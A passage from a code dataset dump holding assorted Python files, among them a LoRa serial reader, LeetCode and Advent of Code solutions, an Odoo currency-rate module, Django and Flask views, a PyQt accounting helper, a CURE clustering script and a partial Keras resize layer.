讀取設定狀態\nprint(\"\\n[4]:FunLora_2_ReadSetup\");\nLoRa.FunLora_2_ReadSetup();\n\n\n# 設定讀取和頻段\nprint(\"\\n[7]:FunLora_3_RX\")\nLoRa.FunLora_3_RX();\n\n\n\n\n#讀取資料\nprint(\"\\n[8]:FunLora_5_write\")\ndata=LoRa.FunLora_6_read();\n\ni=0\t\nfor t1 in data:\n print(\"data[%d]= %s\"%(i,t1))\n i=i+1\n\n\n#讀取資料\nprint(\"\\n[9]:FunLora_7_readCounter\")\ndata=LoRa.FunLora_7_readCounter()\n\n#i=0\t\n#for t1 in data:\n# print(\"data[%d]=%s, Hex->%s\"%(i,t1,t1.encode('hex')))\n# i=i+1\n\n#print(\"data[4]=%s, Hex->%s\"%(data[4],data[4].encode('hex')))\n#print(\"data[5]=%s, Hex->%s\"%(data[5],data[5].encode('hex')))\n\n#讀取資料\ncounter=0\nlastData=[]\nLoRa.debug=False\nwhile True:\n data=LoRa.FunLora_6_readPureData()#取得收到的純資料\n if(len(data)>0):\n if(LoRa.Fun_ArrayIsSame(lastData,data)==False): # 僅顯示出不同的資料\n lastData = list(data)\n counter=counter+1 \n print(data) \n print(counter)\n\n\n\n\n\n\n\n# 關閉\nLoRa.FunLora_close() \nser.close()\n\n","sub_path":"Samples-Python/02-iFrogLabLevel1-Lib/ap-Lib-4-lora-readAndDisplayDifferentData.py","file_name":"ap-Lib-4-lora-readAndDisplayDifferentData.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"468469596","text":"class PhoneBook():\n def __init__(self, phone_book):\n self.phone_book = phone_book\n self.sort_phone_book()\n\n def find(self, number, start, end):\n middle = int((end + start) / 2)\n current_number = self.phone_book[middle][0]\n if current_number == number:\n return self.phone_book[middle][1]\n elif (current_number > number):\n end = middle\n else:\n start = middle\n return self.find(number, start, end)\n\n def find_numbers(self, numbers):\n for number in numbers:\n print(self.find(number, 0, len(self.phone_book)))\n\n def sort_phone_book(self):\n self.phone_book = sorted(self.phone_book, key=lambda tup: tup[0])\n\n\ndef main():\n lengths = input().split(\" \")\n book_length = int(lengths[0])\n searched_numbers_length = int(lengths[1])\n phone_book = []\n counter = 0\n while counter < book_length:\n phone_book.append(input().split(\" \"))\n phone_book[counter][0] = int(phone_book[counter][0])\n counter = counter + 1\n counter = 0\n searched_numbers = []\n while counter < searched_numbers_length:\n searched_numbers.append(int(input()))\n counter = counter + 1\n phone_book = PhoneBook(phone_book)\n phone_book.find_numbers(searched_numbers)\n\nif __name__ == '__main__':\n main()\n","sub_path":"week2/4-Phone-Book/phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"360995108","text":"\"\"\"\r\nproblem 23: Merge k Sorted Lists\r\nhttps://leetcode.com/problems/merge-k-sorted-lists/\r\n\r\nsolution:\r\n https://leetcode.com/problems/merge-k-sorted-lists/solution/\r\n\r\n\"\"\" \r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def mergeKLists(self, lists):\r\n \"\"\"\r\n :type lists: List[ListNode]\r\n :rtype: ListNode\r\n \"\"\"\r\n def divide(l, r):\r\n if l <= r:\r\n middle = l + (r - l) // 2\r\n left = divide(l, middle)\r\n right = divide(middle + 1, r)\r\n return merge(left, right)\r\n else:\r\n return None\r\n\r\n def merge(left, right):\r\n dummy = ListNode(0)\r\n head = dummy\r\n while left or right:\r\n if left is None:\r\n head.next = right\r\n break\r\n elif right is None:\r\n head.next = left\r\n break\r\n else:\r\n if left.val <= right.val:\r\n head.next = left\r\n left = left.next\r\n else:\r\n head.next = right\r\n right = right.next\r\n head = head.next\r\n return dummy.next\r\n\r\n return divide(0, len(lists) - 1)\r\n","sub_path":"P23.py","file_name":"P23.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71201308","text":"import math\nfrom typing import List, Dict, NamedTuple, Literal\nfrom dataclasses import dataclass\nfrom nav_instructions import sample, instructions\n\n\nclass Instruction(NamedTuple):\n cmd: Literal['N', 'S', 'E', 'W', 'L', 'R', 'F']\n val: int\n \n @staticmethod\n def read(x: str):\n return Instruction(cmd=x[0], val=int(x[1:]))\n \n \n@dataclass \nclass Status(Dict):\n x: int\n y: int\n facing: Literal['N', 'S', 'E', 'W', None]\n \n\nclass Boat(NamedTuple):\n plan: List[Instruction]\n origin: Status = Status(x=0, y=0, facing='E')\n status: Status = Status(x=0, y=0, facing='E')\n waypoint: Status = Status(x=10, y=1, facing='E')\n \n @staticmethod\n def initialize(data: str):\n parsed_instructions = [Instruction.read(x) for x in data.split(\"\\n\")]\n start = Status(x=0, y=0, facing=\"E\")\n current = Status(x=0, y=0, facing=\"E\")\n wp = Status(x=10, y=1, facing=None)\n return Boat(plan=parsed_instructions, origin=start, status=current, waypoint=wp)\n \n \n def do_one(self, move: Instruction):\n \"\"\"Process a single move & update self.status\"\"\"\n cmd, val = move\n # Movement\n if cmd == \"N\":\n self.status.y += val \n elif cmd == \"S\":\n self.status.y -= val \n elif cmd == \"E\":\n self.status.x += val \n elif cmd == \"W\":\n self.status.x -= val \n elif cmd == \"F\":\n self.do_one(Instruction(cmd=self.status.facing, val=val))\n \n # Turning\n elif cmd in \"LR\":\n directions = list(\"NESWNES\")\n\n if cmd == \"L\":\n directions = directions[::-1]\n \n self.status.facing = directions.pop(\n directions.index(self.status.facing) + val // 90\n )\n return\n \n def waypoint_one(self, move: Instruction):\n cmd, val = move\n # Movement\n if cmd == \"N\":\n self.waypoint.y += val \n elif cmd == \"S\":\n self.waypoint.y -= val \n elif cmd == \"E\":\n self.waypoint.x += val \n elif cmd == \"W\":\n self.waypoint.x -= val\n elif cmd == \"L\":\n self.rotate_waypoint(val)\n elif cmd == \"R\":\n self.rotate_waypoint(-val)\n elif cmd == \"F\":\n delta_x = self.waypoint.x - self.status.x\n delta_y = self.waypoint.y - self.status.y\n\n self.status.x += delta_x * val\n self.status.y += delta_y * val\n self.waypoint.x = self.status.x + delta_x\n self.waypoint.y = self.status.y + delta_y\n return\n\n def rotate_waypoint(self, deg):\n \"\"\"Adapted from here:\n https://stackoverflow.com/a/34374437\n \"\"\"\n angle = deg * math.pi / 180\n ox, oy = self.status.x, self.status.y\n px, py = self.waypoint.x, self.waypoint.y\n \n self.waypoint.x = ox + math.cos(angle) * (px-ox) - math.sin(angle) * (py-oy)\n self.waypoint.y = oy + math.sin(angle) * (px-ox) + math.cos(angle) * (py-oy)\n return \n \n def navigate(self, method=None):\n if method in ['waypoint', 'wp', 2]:\n func = self.waypoint_one\n else:\n func = self.do_one\n for move in self.plan:\n func(move)\n return int(abs(self.status.x) + abs(self.status.y))\n \n @property\n def dwp(self):\n \"\"\"Helper function to display offset of the waypoint instead of its exact position\"\"\"\n return self.waypoint.x - self.status.x, self.waypoint.y - self.status.y\n \n \nb = Boat.initialize(sample)\ntaxi_dist = b.navigate()\nassert taxi_dist == 25\n\nw = Boat.initialize(sample)\ntaxi_dist = w.navigate('waypoint')\nassert taxi_dist == 286\n\n\nif __name__ == \"__main__\":\n b = Boat.initialize(instructions)\n print(b.navigate())\n \n w = Boat.initialize(instructions)\n print(w.navigate('wp'))","sub_path":"day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"606425249","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime, timedelta\nfrom .currency_helper import CurrencyHelper\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n use_currency_rate = fields.Boolean(string=\"Use Currency Rate\")\n currency_rate_type_id = fields.Many2one('res.currency.rate.type', string='Para Birimi Kur Tipi')\n use_custom_rate = fields.Boolean(string=\"Özel Kur\")\n custom_rate = fields.Float(string='Custom Rate(Özel Kur Değeri)', digits=(12, 6))\n currency_rate = fields.Float(string=\"Para Birimi Kuru\", digits=(12, 6), default=1.0,\n compute='update_currency_rate',\n inverse='_set_custom_rate',\n store=True,\n states={'draft': [('readonly', False)]})\n company_currency_id = fields.Many2one('res.currency', 'Company Currency', related='company_id.currency_id', readonly=True)\n amount_untaxed_signed = fields.Monetary(string='Vergiler Hariç Tutar',\n currency_field='company_currency_id', store=True,\n readonly=True, compute='compute_amount_company_signed')\n amount_total_company_signed = fields.Monetary(string='Toplam (Şirket Para Birimi)',\n currency_field='company_currency_id', store=True,\n readonly=True, compute='compute_amount_company_signed',\n help=\"Total amount in the currency of the company, negative for credit notes.\")\n\n @api.onchange('currency_id')\n def _onchange_pricelist(self):\n if self.currency_id:\n if self.currency_id.id != self.company_id.currency_id.id:\n self.use_currency_rate = True\n return\n self.use_currency_rate = False\n\n @api.multi\n def _set_custom_rate(self):\n if self.currency_rate:\n self.custom_rate = self.currency_rate\n\n @api.multi\n def get_currencies(self, company_currency, currency, date_to_search):\n rate_helper = CurrencyHelper()\n currency_rates = rate_helper.get_rates_on_date(date_to_search, currency, company_currency)\n return currency_rates\n\n @api.multi\n @api.depends('amount_total', 'currency_rate')\n def compute_amount_company_signed(self):\n for record in self:\n if record.currency_id:\n if not record.use_custom_rate:\n currency_id = record.currency_id\n if not record.currency_rate_type_id:\n record.amount_total_company_signed = currency_id.compute(record.amount_total,\n record.company_id.currency_id)\n record.amount_untaxed_signed = currency_id.compute(record.amount_untaxed,\n record.company_id.currency_id)\n else:\n record.amount_total_company_signed = currency_id.compute(record.amount_total,\n record.company_id.currency_id,\n rate_type=record.currency_rate_type_id.name)\n record.amount_untaxed_signed = currency_id.compute(record.amount_untaxed,\n record.company_id.currency_id,\n rate_type=record.currency_rate_type_id.name)\n else:\n record.amount_total_company_signed = record.amount_total * record.currency_rate\n record.amount_untaxed_signed = record.amount_untaxed * record.currency_rate\n else:\n record.amount_total_company_signed = record.amount_total\n record.amount_untaxed_signed = record.amount_untaxed\n\n @api.multi\n @api.depends('use_custom_rate', 'currency_rate_type_id', 'date_order', 'currency_id')\n def update_currency_rate(self):\n for record in self:\n if record.currency_id:\n if record.currency_id.id != record.company_id.currency_id.id:\n record.use_currency_rate = True\n else:\n record.use_currency_rate = False\n else:\n record.use_currency_rate = False\n\n if not record.use_custom_rate and record.use_currency_rate:\n currency_rate_obj = self.env['res.currency.rate']\n date_found = datetime.strptime(datetime.today().strftime(\"%Y-%m-%d\"),\n \"%Y-%m-%d\") - timedelta(days=1)\n date_to_search = date_found.strftime(\"%Y-%m-%d\")\n if record.date_order:\n #date_found = datetime.strptime(record.date_order, \"%Y-%m-%d %H:%M:%S\") - timedelta(days=1)\n date_found = record.date_order - timedelta(days=1)\n date_to_search = date_found.strftime(\"%Y-%m-%d\")\n search_domain = [('currency_id', '=', record.currency_id.id),\n ('name', '=', date_to_search)]\n if record.company_id:\n search_domain += [('company_id', '=', record.company_id.id)]\n last_id = currency_rate_obj.search(search_domain, limit=1)\n # Get Currency Rate\n if not last_id:\n company_currency = record.company_id.currency_id.name if (\n record.company_id and record.company_id.currency_id) else \"TRY\"\n currency_rates = record.get_currencies(company_currency, record.currency_id.name, date_to_search)\n if currency_rates:\n # perform another search cause rate_helper returns different date then sent one\n search_domain = [('currency_id', '=', record.currency_id.id),\n ('name', '=', currency_rates[\"date\"])]\n if record.company_id:\n search_domain += [('company_id', '=', record.company_id.id)]\n last_id = currency_rate_obj.search(search_domain, limit=1)\n if not last_id:\n last_id = currency_rate_obj.create({'currency_id': record.currency_id.id,\n 'rate': currency_rates[\"banknote_selling\"],\n 'banknot_buying_rate': currency_rates[\n \"banknote_buying\"],\n 'forex_selling_rate': currency_rates[\n \"forex_selling\"],\n 'forex_buying_rate': currency_rates[\"forex_buying\"],\n 'name': currency_rates[\"date\"],\n 'company_id': record.company_id.id})\n\n if record.currency_rate_type_id:\n rate_type = record.currency_rate_type_id\n if rate_type.name == 'Efektif Satış':\n if last_id.rate > 0.0:\n record.currency_rate = 1 / last_id.rate\n elif rate_type.name == 'Efektif Alış':\n if last_id.banknot_buying_rate > 0.0:\n record.currency_rate = 1 / last_id.banknot_buying_rate\n elif rate_type.name == 'Döviz Satış':\n if last_id.forex_selling_rate > 0.0:\n record.currency_rate = 1 / last_id.forex_selling_rate\n elif rate_type.name == 'Döviz Alış':\n if last_id.forex_buying_rate > 0.0:\n record.currency_rate = 1 / last_id.forex_buying_rate\n else:\n if last_id.rate > 0.0:\n record.currency_rate = 1 / last_id.rate\n else:\n if not record.currency_rate:\n record.currency_rate = 1.0\n","sub_path":"tcmb_currency_rate_live-v12/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"264167085","text":"class Contacto():\n\n #posición del registro a editar\n indice = -1\n #lista de contactos\n contactos = []\n\n #Método constructor\n def __init__(varClase, id, \\\n nombre, \\\n correo, \\\n movil):\n varClase.id = id\n varClase.nombre = nombre\n varClase.correo = correo\n varClase.movil = movil\n\n def actualizar(varClase, id, nombre, correo, movil):\n varClase.id = id\n varClase.nombre = nombre\n varClase.correo = correo\n varClase.movil = movil\n\n #Obtener la lista de Contactos o un contacto en particular desde un archivo\n @staticmethod\n def obtener(nombreArchivo, id=\"\"):\n lineas = open(nombreArchivo, \"r\")\n if id == \"\":\n Contacto.contactos = []\n Contacto.indice = -1\n for linea in lineas:\n datos = linea.split(\";\")\n if len(datos)>=4:\n c = Contacto(datos[0], datos[1], datos[2], datos[3])\n Contacto.contactos.append(c)\n else:\n for linea in lineas:\n datos = linea.split(\";\")\n if datos[0] == id:\n c = Contacto(datos[0], datos[1], datos[2], datos[3])\n return c\n return None\n\n #Convertir los registros en una matriz de textos\n @staticmethod\n def pasarMatriz():\n matriz = []\n for jesus in Contacto.contactos:\n linea = []\n linea.append(jesus.id)\n linea.append(jesus.nombre)\n linea.append(jesus.correo)\n linea.append(jesus.movil)\n matriz.append(linea)\n return matriz\n\n #Método para Agregar un Contacto\n @staticmethod\n def agregar(id, nombre, correo, movil):\n c = Contacto(id, nombre, correo, movil)\n Contacto.contactos.append(c)\n\n #Método para Modificar un Contacto\n @staticmethod\n def modificar(id, nombre, correo, movil):\n if Contacto.indice in range(0, len(Contacto.contactos)):\n Contacto.contactos[Contacto.indice].actualizar(id, nombre, correo, movil)\n\n #Método para Eliminar un Contacto\n @staticmethod\n def eliminar():\n if Contacto.indice in range(0, len(Contacto.contactos)):\n del Contacto.contactos[Contacto.indice]\n\n #Método para Ordenar la lista de Contactos\n @staticmethod\n def ordenar():\n\n for i in range(len(Contacto.contactos)-1):\n for j in range(i+1, len(Contacto.contactos)):\n if Contacto.contactos[i].nombre > Contacto.contactos[j].nombre:\n #Intercambio de contactos\n t = Contacto.contactos[i]\n Contacto.contactos[i] = Contacto.contactos[j]\n Contacto.contactos[j] = t\n\n\n #Método para Guardar los Contactos en un archivo\n @staticmethod\n def guardar(nombreArchivo):\n #Abrir el archivo para escritura\n archivo = open(nombreArchivo, \"w\")\n\n for c in Contacto.contactos:\n linea = c.id + \";\" + \\\n c.nombre + \";\" + \\\n c.correo + \";\" + \\\n c.movil\n #guardo cada linea\n archivo.write(linea)\n #cerrar el archivo\n archivo.close()\n\n \n\n \n","sub_path":"Ciclo1/Semana6/CRUD Contactos/Contacto.py","file_name":"Contacto.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642625963","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nSECRET_KEY = 'Sup3r$3cretkey'\n\nUPLOAD_FOLDER = './app/static/uploads'\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']=\"postgresql://profiles:calabar12@localhost/profiles\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\ndb = SQLAlchemy(app)\napp.config.from_object(__name__)\nfrom app import views","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"133000676","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\n# Create your views here.\n\ndef index(request):\n request.session.flush()\n return render(request, 'register.html')\n\ndef register(request):\n if request.method == \"POST\":\n errors = User.objects.reg_validator(request.POST)\n if len(errors) != 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/')\n hashed_pw = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()\n new_user = User.objects.create(\n first_name = request.POST['first_name'], \n last_name = request.POST['last_name'],\n email = request.POST['email'],\n password = hashed_pw,\n )\n request.session['user_id'] = new_user.id\n return redirect('/books')\n return redirect('/')\n\ndef login(request):\n if request.method == \"POST\":\n errors = User.objects.login_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/')\n if request.method == 'POST':\n the_user = User.objects.get(email=request.POST['email'])\n if bcrypt.checkpw(request.POST['password'].encode(), the_user.password.encode()):\n print(request.method)\n request.session['user_id'] = the_user.id\n request.session['greeting'] = the_user.first_name\n return redirect('/books')\n messages.error(request, \"Email or Password incorrect\")\n return redirect('/')\n\ndef logout(request):\n request.session.flush()\n return redirect('/')\n\ndef show_all(request):\n if \"user_id\" not in request.session:\n return redirect('/')\n else:\n context = {\n 'all_books': Book.objects.all(),\n 'the_user': User.objects.get(id=request.session['user_id'])\n }\n return render(request, 'showall.html', context)\n\ndef create_book(request):\n errors = Book.objects.book_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/books')\n else:\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.create(\n title = request.POST['title'],\n description = request.POST['description'],\n creator = user\n )\n user.favorited_books.add(book)\n return redirect(f'/books/{book.id}')\n\ndef show_one(request, user_id):\n context = {\n 'book': Book.objects.get(id=user_id),\n 'the_user': User.objects.get(id=request.session['user_id']),\n }\n return render(request, \"showone.html\", context)\n\ndef update(request, user_id):\n book = Book.objects.get(id=user_id)\n book.description = request.POST['description']\n book.save()\n return redirect(f'/books/{user_id}')\n\ndef delete(request, user_id):\n book = Book.objects.get(id=user_id)\n book.delete()\n return redirect('/books')\n\ndef favorite(request, user_id):\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.get(id=user_id)\n user.favorited_books.add(book)\n return redirect(f'/books/{user_id}')\n\ndef unfavorite(request, user_id):\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.get(id=user_id)\n user.favorited_books.remove(book)\n return redirect(f'/books/{user_id}')","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82239614","text":"from django import forms\nfrom .models import CuttedUrl\nfrom django.core.exceptions import ValidationError\n\n\nclass URLForm(forms.Form):\n url = forms.URLField(label='Вставьте ссылку:')\n\n def clean_code(self):\n urls = CuttedUrl.objects.all()\n verifiable_code = self.cleaned_data.get('code')\n codes = []\n for obj in urls:\n codes.append(obj.code)\n if verifiable_code in codes:\n raise ValidationError('Такой код уже существует!')\n return verifiable_code\n","sub_path":"src/cutter/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464669539","text":"# -*- coding: utf-8 -*-\n\nimport platform\nfrom PyQt4 import QtCore\n\nclass SAP_jurnal(object):\n def __init__ (self):\n pass\n \n def txtlst_debet(self):\n debet=QtCore.QStringList()\n debet.append(\"-- pilih salah satu --\")\n debet.append(\"kas di tangan\")\n debet.append(\"peralatan\")\n debet.append(\"biaya listrik\")\n debet.append(\"biaya telepon\")\n debet.append(\"biaya gaji\")\n debet.append(\"kas di bank\")\n return debet\n \n def txtlst_kredit(self):\n kredit=QtCore.QStringList()\n kredit.append(\"-- pilih salah satu --\")\n kredit.append(\"modal\")\n kredit.append(\"penjualan\")\n kredit.append(\"kas di tangan\")\n kredit.append(\"pinjaman\")\n return kredit\n \n def txtlst_kredit_debet(self, debet):\n kredit=QtCore.QStringList()\n \n if debet == \"-- pilih salah satu --\":\n kredit.append(\"-- pilih salah satu debet --\")\n elif debet == \"kas di tangan\":\n kredit.append(\"modal\")\n kredit.append(\"penjualan\")\n elif debet == \"peralatan\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya listrik\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya telepon\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya gaji\":\n kredit.append(\"kas di tangan\")\n elif debet == \"kas di bank\":\n kredit.append(\"kas di tangan\")\n kredit.append(\"pinjaman\")\n \n return kredit\n \n#======================================================================================================\n\n def int_debet(self, debet):\n if debet == \"kas di tangan\":\n result = 1\n elif debet == \"peralatan\":\n result = 2\n elif debet == \"biaya listrik\":\n result = 3\n elif debet == \"biaya telepon\":\n result = 4\n elif debet == \"biaya gaji\":\n result = 5\n elif debet == \"kas di bank\":\n result = 6\n return result\n \n def int_kredit(self, kredit):\n if kredit == \"modal\":\n result=1\n elif kredit == \"penjualan\":\n result=2\n elif kredit == \"kas di tangan\":\n result=3\n elif kredit == \"pinjaman\":\n result=4\n return result\n \n#======================================================================================================\n \n def view_tabel(self, dbase):\n tblview=QtCore.QProcess()\n tblviewarg=QtCore.QStringList()\n \n if platform.system() == \"Linux\":\n tblviewarg.append(dbase)\n tblview.startDetached(\"./tblview/jurnal.py\",tblviewarg)\n elif platform.system() == \"Windows\":\n tblviewarg.append(\"tblview\\jurnal.py\")\n tblviewarg.append(dbase)\n tblview.startDetached(\"pythonw\",tblviewarg)\n \n def search_tabel(self, dbase, search_field, search_string):\n tblsearch=QtCore.QProcess()\n tblsearcharg=QtCore.QStringList()\n \n if platform.system() == \"Linux\":\n tblsearcharg.append(dbase)\n tblsearcharg.append(search_field)\n tblsearcharg.append(search_string)\n tblsearch.startDetached(\"./tblview/search.py\",tblsearcharg)\n elif platform.system() == \"Windows\":\n tblsearcharg.append(\"tblview\\search.py\")\n tblsearcharg.append(dbase)\n tblsearcharg.append(search_field)\n tblsearcharg.append(search_string)\n tblsearch.startDetached(\"pythonw\",tblsearcharg)\n","sub_path":"sources/sap_jurnal.py","file_name":"sap_jurnal.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558600564","text":"\n\nclass MethodOfLinesTVD(object):\n\n def plot(self):\n figs = [ ]\n for scheme in ['pcm2', 'plm2']:\n try:\n figs.append(self.with_scheme(scheme))\n except IOError as e:\n print(e)\n return figs\n\n\nclass RelativisticShocktube1(MethodOfLinesTVD):\n\n def with_scheme(self, scheme):\n import os\n import h5py\n import matplotlib.pyplot as plt\n\n base = 'RelativisticShocktube1-{0}'.format(scheme)\n chkpt = h5py.File (os.path.join('data', '{0}.0001.h5'.format(base)), 'r')\n d = chkpt['primitive']['density'][...]\n p = chkpt['primitive']['pressure'][...]\n u = chkpt['primitive']['velocity1'][...]\n\n fig = plt.figure()\n ax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\n ax1.plot(d, '-o', mfc='none', label=r'$\\rho$')\n ax1.plot(p, '-o', mfc='none', label=r'$p$')\n ax1.plot(u, '-o', mfc='none', label=r'$u$')\n ax1.legend(loc='best')\n fig.suptitle(base)\n return fig\n\n\n\ndef search(name, terms):\n if not terms: return True\n\n for term in terms:\n if term.startswith('~') and term[1:] in name:\n return False\n if not term.startswith('~') and term in name:\n return True\n return False\n\n\ndef main():\n import matplotlib.pyplot as plt\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"search_terms\", nargs='*', help=\"search terms to match in test figures\")\n parser.add_argument(\"-l\", \"--list\", action='store_true', help=\"only show the list of tests\")\n parser.add_argument(\"--pdf\", action='store_true', help=\"export figures to PDF\")\n args = parser.parse_args()\n\n plotters = [RelativisticShocktube1()]\n\n for plotter in plotters:\n\n name = plotter.__class__.__name__\n\n if not search(name, args.search_terms):\n continue\n\n print(plotter.__class__)\n\n if args.list:\n continue\n\n try:\n figs = plotter.plot()\n\n if args.pdf:\n [fig.savefig(name + '.pdf') for fig in figs]\n\n except IOError as e:\n print(e)\n\n if not args.pdf:\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Vis/RegressionRelativistic.py","file_name":"RegressionRelativistic.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"36829516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author:Wen\r\n\"\"\"\r\nimport torch as t\r\ndef predict(Input,NumberClass):\r\n shape = Input.size()[2:]\r\n batchsize = Input.size()[0]\r\n Input = Input.view(batchsize,NumberClass,-1)\r\n Input = t.max(Input,1)[1].view(batchsize,shape[0],shape[1])\r\n return Input\r\n\r\nif __name__ == \"__main__\":\r\n a = t.Tensor(\r\n [[[[1.0,2.0],[5.0,2.0]],\r\n [[2.0,3.0],[4.0,2.0]]],\r\n [[[2.0,3.0],[2.0,3.0]],\r\n [[2.0,3.0],[1.0,2.0]]]]\r\n )\r\n s = predict(a ,2)\r\n print(s)\r\n for x in range(10):\r\n print(x)\r\n x = t.tensor([[1,0.5,0.5,0.5,0.6],[0.1,0.5,0.2,0.4,0.7]],dtype = t.float32)\r\n print((x>0.5).float())","sub_path":"evaluate/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192947356","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nPhilippe M. Noël\nClustering Using REpresentatives (CURE) Algorithm -- Python 3\nOriginal Code from Harvard APMTH120\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport numpy as np\nimport scipy as scipy\nimport matplotlib.pyplot as plt\nfrom numpy import linalg\nfrom scipy import io\nfrom scipy.spatial.distance import pdist,squareform\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.cluster.hierarchy import fcluster\n\ndef CURE(X, N):\n \"\"\" Clustering Using REpresentatives from .mat file \"\"\"\n # randomly submsapling data to generate representatives\n np.random.seed(3989) # other seeds could be used\n X = X[:,np.random.permutation(N)]\n N_reps = 300 # arbitrarily subsampling first 300 points\n X_reps = X[:,0:N_reps]\n\n # hierarchical clustering of subsampe to get representatives\n Z = linkage(X.T, 'single') # single linkage due to nature of data\n k = 2 # 2 clusters\n IDX_reps = fcluster(Z, k, criterion='maxclust')\n\n # plotting representatives for visualization\n plt.figure(1); plot.clf()\n reds = np.vstack([X_reps[:,i] for i in range(N_reps) if IDX_reps[i] == 1])\n blues = np.vstack([X_reps[:,i] for i in range(N_reps) if IDX_reps[i] == 2])\n plt.plot(reds[:,0], red[:,1], '.r'); plt.plot(blues[:,0], blues[:,1], '.b')\n plt.legend(['Cluster #1', 'Cluster #2'])\n plt.title('Representatives, N = ' + str(N_reps))\n\n # going over data set to assign all points to clusters\n distances, IDX = np.zeros(N_reps), np.zeros(N)\n for i in range(N):\n # find nearest representative to data point i\n for j in range(N_reps):\n distances[j] = scipy.linalg.norm(X[:,i] - X_reps[:,j])\n # find nearest cluster and assign it\n nearest = np.argmin(distances)\n IDX[i] = IDX_reps[nearest]\n\n # plotting clustered dataset\n plt.figure(2); plot.clf()\n reds = np.vstack([X[:,i] for i in range(N) if IDX[i] == 1])\n blues = np.vstack([X[:,i] for i in range(N) if IDX[i] == 2])\n plt.plot(reds[:,0], red[:,1], '.r'); plt.plot(blues[:,0], blues[:,1], '.b')\n plt.legend(['Cluster #1', 'Cluster #2'])\n plt.title('Full Dataset, N = ' + str(N))\n\n\n\n\n# test driver & data generation\n# loading data\nX = scipy.io.loadmat('CURE_data.mat')['X']\nN = len(X[1,:])\nCURE(X, N)\n","sub_path":"CURE/CURE.py","file_name":"CURE.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"127676224","text":"import keras\nimport keras.backend as K\nfrom keras.utils import conv_utils\nfrom keras.engine import InputSpec\nfrom keras.engine import Layer\nfrom tensorflow import image as tfi\n\n\n# Credits to KeithWM for ResizeImages (see: https://stackoverflow.com/a/44900216)\n# slightly modified for current Keras version\nclass ResizeImages(Layer):\n \"\"\"Resize Images to a specified size\n\n # Arguments\n output_size: Size of output layer width and height\n data_format: A string,\n one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, height, width, channels)` while `channels_first`\n corresponds to inputs with shape\n `(batch, channels, height, width)`.\n It defaults to the 